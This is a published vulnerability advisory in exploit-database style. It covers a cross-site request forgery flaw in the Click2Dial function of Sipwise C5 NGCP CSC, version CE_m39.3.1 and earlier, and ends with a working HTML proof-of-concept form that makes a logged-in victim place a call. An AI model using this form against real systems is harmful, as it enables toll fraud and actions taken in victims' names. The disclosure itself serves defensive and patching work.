53 lines
No EOL
1.8 KiB
HTML
53 lines
No EOL
1.8 KiB
HTML
# Exploit Title: Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)
|
|
# Date: 13.04.2021
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: https://www.sipwise.com
|
|
|
|
Sipwise C5 NGCP CSC CSRF Click2Dial Exploit
|
|
|
|
|
|
Vendor: Sipwise GmbH
|
|
Product web page: https://www.sipwise.com
|
|
Affected version: <=CE_m39.3.1
|
|
NGCP www_admin version 3.6.7
|
|
|
|
Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
|
|
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
|
|
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
|
|
conferencing etc.) that can be configured by end users in the self-care web interface.
|
|
For operators, it offers a web-based administrative panel that allows them to configure
|
|
subscribers, SIP peerings, billing profiles, and other entities. The administrative web
|
|
panel also shows the real-time statistics for the whole system. For tight integration
|
|
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.
|
|
|
|
Desc: The application interface allows users to perform certain actions via HTTP requests
|
|
without performing any validity checks to verify the requests. This can be exploited to
|
|
perform certain actions with administrative privileges if a logged-in user visits a malicious
|
|
web site.
|
|
|
|
Tested on: Apache/2.2.22 (Debian)
|
|
Apache/2.2.16 (Debian)
|
|
nginx
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2021-5649
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5649.php
|
|
|
|
|
|
13.04.2021
|
|
|
|
--
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<form action="https://10.0.1.7/call/click2dial" method="POST">
|
|
<input type="hidden" name="d" value="%2B3897031337" />
|
|
<input type="submit" value="Dial and charge!" />
|
|
</form>
|
|
</body>
|
|
</html> |